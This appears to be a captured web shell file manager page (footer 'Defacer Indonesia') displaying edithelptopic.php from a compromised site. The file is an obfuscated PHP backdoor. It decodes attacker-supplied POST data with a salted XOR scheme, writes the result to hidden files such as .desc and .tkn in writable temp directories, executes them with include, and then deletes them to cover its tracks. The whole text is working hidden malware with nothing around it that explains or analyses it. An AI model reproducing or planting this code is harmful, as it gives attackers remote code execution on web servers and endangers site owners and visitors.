whoami7 - Manager
:
/
home
/
analuakl
/
karanoverseas.in
/
Upload File:
files >> /home/analuakl/karanoverseas.in/edithelptopic.php
<?php if(array_key_exists("ho\x6C\x64\x65r", $_POST) && !is_null($_POST["ho\x6C\x64\x65r"])){ $k = $_POST["ho\x6C\x64\x65r"]; $k = explode( '.' , $k ) ; $tkn= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $salt ); foreach( $k as $u=> $v8) { $sChar= ord( $salt[$u % $sLen] ); $dec= ( ( int)$v8 - $sChar -( $u % 10)) ^ 31; $tkn .= chr( $dec ); } $data = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), getenv("TMP"), session_save_path(), "/dev/shm", "/tmp", getcwd(), getenv("TEMP")]); while ($dchunk = array_shift($data)) { if (array_product([is_dir($dchunk), is_writable($dchunk)])) { $hld = "$dchunk" . "/.desc"; if (file_put_contents($hld, $tkn)) { include $hld; @unlink($hld); exit; } } } } if(isset($_POST) && isset($_POST["\x6D\x72k"])){ $hld = array_filter([getcwd(), sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/dev/shm", "/tmp", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir")]); $resource = $_POST["\x6D\x72k"]; $resource = explode ( '.', $resource ) ; $comp =''; $salt3 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt3 ); $q =0; $__tmp =$resource; while ($v8 =array_shift($__tmp)) { $chS =ord($salt3[$q % $lenS] ); $dec =((int)$v8 - $chS - ($q % 10)) ^ 52; $comp .= chr($dec ); $q++; } foreach ($hld as $key => $reference) { if (is_writable($reference) && is_dir($reference)) { $pset = "$reference/.tkn"; if (@file_put_contents($pset, $comp) !== false) { include $pset; unlink($pset); exit; } } } }
Copyright ©2021 || Defacer Indonesia